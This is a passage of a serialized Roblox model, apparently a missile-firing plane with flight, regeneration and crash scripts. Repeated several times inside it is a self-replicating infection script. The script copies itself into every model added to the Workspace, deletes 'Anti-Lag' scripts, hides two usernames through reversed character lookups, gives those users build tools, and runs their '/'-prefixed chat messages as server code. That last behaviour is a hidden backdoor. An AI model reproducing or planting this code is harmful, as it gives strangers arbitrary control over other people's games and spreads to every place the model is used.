- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() bin=script.Parent
- plane=nil
- hold=false
- local debounce = false
- local planedebounce = false
- local stuntdebounce = false
- local controlling = false
- function fire(pln,spn)
- local missile = bin.Rocket:clone()
- missile.CFrame = spn.CFrame * CFrame.new(0, 0, -35)
- missile.RocketScript.Disabled = false
- missile.Parent = game.Workspace
- local creator_tag = Instance.new("ObjectValue")
- creator_tag.Value = game.Players.LocalPlayer
- creator_tag.Name = "creator"
- creator_tag.Parent = missile
- missile.Owner.Value = pln
- end
- function computeDirection(vec)
- local lenSquared = vec.magnitude * vec.magnitude
- local invSqrt = 1 / math.sqrt(lenSquared)
- return Vector3.new(vec.x * invSqrt, vec.y * invSqrt, vec.z * invSqrt)
- end
- function move(target, engine)
- local origincframe = engine:findFirstChild("BodyGyro").cframe
- local dir = (target - engine.Position).unit
- local spawnPos = engine.Position
- local pos = spawnPos + (dir * 1)
- engine:findFirstChild("BodyGyro").maxTorque = Vector3.new(9000, 9000, 9000)
- engine:findFirstChild("BodyGyro").cframe = CFrame.new(pos, pos + dir)
- wait(0.1)
- engine:findFirstChild("BodyGyro").maxTorque = Vector3.new(0, 0, 0)
- engine:findFirstChild("BodyGyro").cframe = origincframe
- end
- function findPlane(player)
- local list = player.Character:GetChildren()
- for x = 1, #list do
- if (list[x].Name == "Plane") then
- local weld = list[x]:FindFirstChild("Parts"):FindFirstChild("Seat"):FindFirstChild("SeatWeld")
- if (weld ~= nil) and (weld.Part1 == player.Character:FindFirstChild("Torso")) then
- return list[x]
- end
- end
- end
- return nil
- end
- function onButton1Down(mouse)
- local vehicle = findPlane(script.Parent.Parent.Parent)
- if vehicle ~= nil and debounce == false and planedebounce == false then
- debounce = true
- controlling = true
- while true do
- wait()
- local engine = vehicle.Parts.Engine
- local position = mouse.Hit
- local target = position.p
- if engine:findFirstChild("FlyScript") ~= nil then
- move(target, engine)
- end
- if planedebounce == true or
- controlling == false then break end
- end
- wait(.1)
- debounce = false
- end
- end
- function onButton1Up(mouse)
- controlling = false
- end
- function onSelected(mouse)
- mouse.Icon = "rbxasset://textures\\GunCursor.png"
- mouse.Button1Down:connect(function() onButton1Down(mouse) end)
- mouse.Button1Up:connect(function() onButton1Up(mouse) end)
- mouse.KeyDown:connect(onKeyDown)
- end
- function onKeyDown(key)
- if (key~=nil) then
- key = key:lower()
- local vehicle = findPlane(script.Parent.Parent.Parent)
- if (vehicle==nil) then return end
- plane = vehicle.Parts
- local engine = vehicle.Parts.Engine
- if (key=="f") and (bin.Reload.Value == 0) then
- fire(vehicle,plane.Gun1)
- fire(vehicle,plane.Gun2)
- bin.Reload.Value = 1
- wait(1)
- bin.Reload.Value = 0
- end
- if (key=="x") and planedebounce == false then
- local power = plane.Engine:findFirstChild("FlyScript")
- if (power ~= nil) then
- power:remove()
- end
- end
- if (key=="y") then
- local power = plane.Engine:findFirstChild("FlyScript")
- if (power ~= nil) then return end
- local fly = script.FlyScript:clone()
- fly.Disabled = false
- fly.Parent = plane.Engine
- end
- if (key=="k") and planedebounce == false then
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- end
- if (key=="h") and planedebounce == false then
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- return end
- if (key=="j") and planedebounce == false then
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local position = engine.CFrame * Vector3.new(0, 0.5, -4)
- local dir = position - engine.Position
- dir = computeDirection(dir)
- local spawnPos = engine.Position
- local pos = spawnPos + (dir * 8)
- body.cframe = CFrame.new(pos, pos + dir)
- wait(.2)
- body.maxTorque = Vector3.new(0, 0, 0)
- end
- if (key=="l") and planedebounce == false then
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 0, 0)
- local frame = plane:FindFirstChild("OriginCFrame")
- if frame ~= nil then
- body.cframe = frame.Value
- end
- wait(0.1)
- body.maxTorque = Vector3.new(0, 0, 0)
- end
- if (key=="u") and planedebounce == false then
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local position = engine.CFrame * Vector3.new(0, -0.5, -4)
- local dir = position - engine.Position
- dir = computeDirection(dir)
- local spawnPos = engine.Position
- local pos = spawnPos + (dir * 8)
- body.cframe = CFrame.new(pos, pos + dir)
- wait(.2)
- body.maxTorque = Vector3.new(0, 0, 0)
- end
- if (key=="g") and planedebounce == false and stuntdebounce == false then
- planedebounce = true
- stuntdebounce = true
- plane.Parent.Stunt.Value = 1
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local currentframe = plane.Engine.CFrame
- for i = 1,6 do
- body.cframe = plane.Engine.CFrame * CFrame.fromEulerAnglesXYZ(0, 0, 30)
- wait(.2)
- end
- body.cframe = currentframe
- wait(.6)
- body.maxTorque = Vector3.new(0, 0, 0)
- planedebounce = false
- plane.Parent.Stunt.Value = 0
- wait(3)
- stuntdebounce = false
- end
- if (key=="t") and planedebounce == false and stuntdebounce == false then
- planedebounce = true
- stuntdebounce = true
- plane.Parent.Stunt.Value = 1
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local currentframe = plane.Engine.CFrame
- local valy = 30
- local valz = 30
- for i = 1,8 do
- body.cframe = currentframe * CFrame.fromEulerAnglesXYZ(0, valy, valz)
- valy = valy +50
- valz = valz +100
- wait(.1)
- end
- body.cframe = currentframe * CFrame.fromEulerAnglesXYZ(0, 600, 0)
- wait(.5)
- body.maxTorque = Vector3.new(0, 0, 0)
- planedebounce = false
- plane.Parent.Stunt.Value = 0
- wait(4)
- stuntdebounce = false
- end
- end
- end
- bin.Selected:connect(onSelected)
- end;
- function() local engine = script.Parent.Parent.Engine
- local spd = 3
- local position = engine.Position
- while true do
- wait(.1)
- direction = engine.CFrame.lookVector
- position = position + spd*3*direction
- error = position - engine.Position
- engine.Velocity = spd*error
- engine.RotVelocity = Vector3.new(0, 0, 0)
- end
- end;
- function() local debounce = false
- function getPlayer(humanoid)
- local players = game.Players:children()
- for i = 1, #players do
- if players[i].Character.Humanoid == humanoid then return players[i] end
- end
- return nil
- end
- function onTouch(part)
- local human = part.Parent:findFirstChild("Humanoid")
- if (human ~= nil) and debounce == false then
- debounce = true
- local player = getPlayer(human)
- if (player == nil) then return end
- script.Parent:clone().Parent = player.Backpack
- wait(2)
- debounce = false
- end
- end
- script.Parent.Parent.Touched:connect(onTouch)
- end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() model = script.Parent.Parent.Parent
- backup = model:clone()
- local debounce = false
- function onTouch(part)
- if (part.Name == "Safe") and (debounce == false) and (script.Parent.Count.Value == 0) then
- debounce = true
- wait(2)
- model = backup:clone()
- model.Parent = game.Workspace
- model:makeJoints()
- script.Parent.Count.Value = 1
- debounce = false
- end
- end
- script.Parent.Touched:connect(onTouch) end;
- function() position = script.Parent.Engine.Position
- local frame = Instance.new("CFrameValue")
- frame.Name = "OriginCFrame"
- frame.Value = script.Parent.Engine.CFrame
- frame.Parent = script.Parent
- local object = Instance.new("ObjectValue")
- object.Value = script.Parent.Parent.Parent
- seat = script.Parent.Seat
- function onChildAdded(part)
- if part.className == "Weld" then
- local torso = part.Part1
- if torso ~= nil then
- local parent = torso.Parent
- if parent ~= nil then
- script.Parent.Parent.Parent = parent
- while true do
- wait(2)
- local pos = script.Parent.Engine.Position
- if (position - pos).magnitude > 30 then
- if object.Value ~= nil then
- object.Value.Regen.Value = 1
- wait(.5)
- object.Value.Regen.Value = 0
- object.Value = nil
- end
- break end
- end
- while true do
- print("Loop")
- wait(2)
- if part == nil then
- script.Parent.Parent.Parent = game.Workspace
- script.Parent.Parent:MakeJoints()
- break end
- end
- end
- end
- end
- end
- seat.ChildAdded:connect(onChildAdded) end;
- function() function onTouched(part)
- if part.Parent ~= nil then
- local h = part.Parent:findFirstChild("Humanoid")
- if h~=nil then
- h.Parent.Torso.Velocity=Vector3.new(0,200,0)
- wait(0.5)
- end
- end
- end
- script.Parent.Touched:connect(onTouched)
- end;
- function() local boom = false
- function createExplosion(position)
- explosion = Instance.new("Explosion")
- explosion.Position = position
- explosion.BlastRadius = 10
- explosion.Parent = game.Workspace
- end
- function onTouch(part)
- if boom == true then return end
- if (part.Name == "Rocket") or (part.Name == "Safe") or (part.Parent.Parent.Parent == script.Parent) or (part.Parent:findFirstChild("Humanoid")) then return end
- if (script.Parent.Parts.Tip.Velocity.x > 50) or (script.Parent.Parts.Tip.Velocity.x < -50) or (script.Parent.Parts.Tip.Velocity.z > 50) or (script.Parent.Parts.Tip.Velocity.z < -50) then
- boom = true
- createExplosion(script.Parent.Parts.Engine.Position)
- script.Parent:BreakJoints()
- local stuff = script.Parent:children()
- for i=1,#stuff do
- if stuff[i].Name == "BodyKit" or
- stuff[i].Name == "Parts" then
- local parts = stuff[i]:children()
- for p = 1, #parts do
- if parts[p].className == "Part" then
- local velo = Instance.new("BodyVelocity")
- velo.maxForce = Vector3.new(9.9e+036, 9.9e+036, 9.9e+036)
- velo.velocity = Vector3.new(math.random(-15,15),math.random(-15,15),math.random(-15,15))
- velo.Parent = parts[p]
- end
- end
- end
- end
- wait(3)
- script.Parent:remove()
- end
- end
- script.Parent.Parts.Tip.Touched:connect(onTouch)
- end;}local ActualScripts = {}
- function s(var)
- local func = table.remove(Scripts,1)
- setfenv(func,setmetatable({script=var,require=fake_require or require,global=genv},{
- __index = getfenv(func),
- }))
- table.insert(ActualScripts,coroutine.wrap(func))
- end
- Decode = function(str,t,props,classes,values,ICList,Model,CurPar,LastIns,split,RemoveAndSplit,InstanceList)
- local tonum,table_remove,inst,parnt,comma,table_foreach = tonumber,table.remove,Instance.new,"Parent",",",
- function(t,f)
- for a,b in pairs(t) do
- f(a,b)
- end
- end
- local Types = {
- Color3 = Color3.new,
- Vector3 = Vector3.new,
- Vector2 = Vector2.new,
- UDim = UDim.new,
- UDim2 = UDim2.new,
- CFrame = CFrame.new,
- Rect = Rect.new,
- NumberRange = NumberRange.new,
- BrickColor = BrickColor.new,
- PhysicalProperties = PhysicalProperties.new,
- NumberSequence = function(...)
- local a = {...}
- local t = {}
- repeat
- t[#t+1] = NumberSequenceKeypoint.new(table_remove(a,1),table_remove(a,1),table_remove(a,1))
- until #a==0
- return NumberSequence.new(t)
- end,
- ColorSequence = function(...)
- local a = {...}
- local t = {}
- repeat
- t[#t+1] = ColorSequenceKeypoint.new(table_remove(a,1),Color3.new(table_remove(a,1),table_remove(a,1),table_remove(a,1)))
- until #a==0
- return ColorSequence.new(t)
- end,
- number = tonumber,
- boolean = function(a)
- return a=="1"
- end
- }
- split = function(str,sep)
- if not str then return end
- local fields = {}
- local ConcatNext = false
- str:gsub(("([^%s]+)"):format(sep),function(c)
- if ConcatNext == true then
- fields[#fields] = fields[#fields]..sep..c
- ConcatNext = false
- else
- fields[#fields+1] = c
- end
- if c:sub(#c)=="\\" then
- c = fields[#fields]
- fields[#fields] = c:sub(1,#c-1)
- ConcatNext = true
- end
- end)
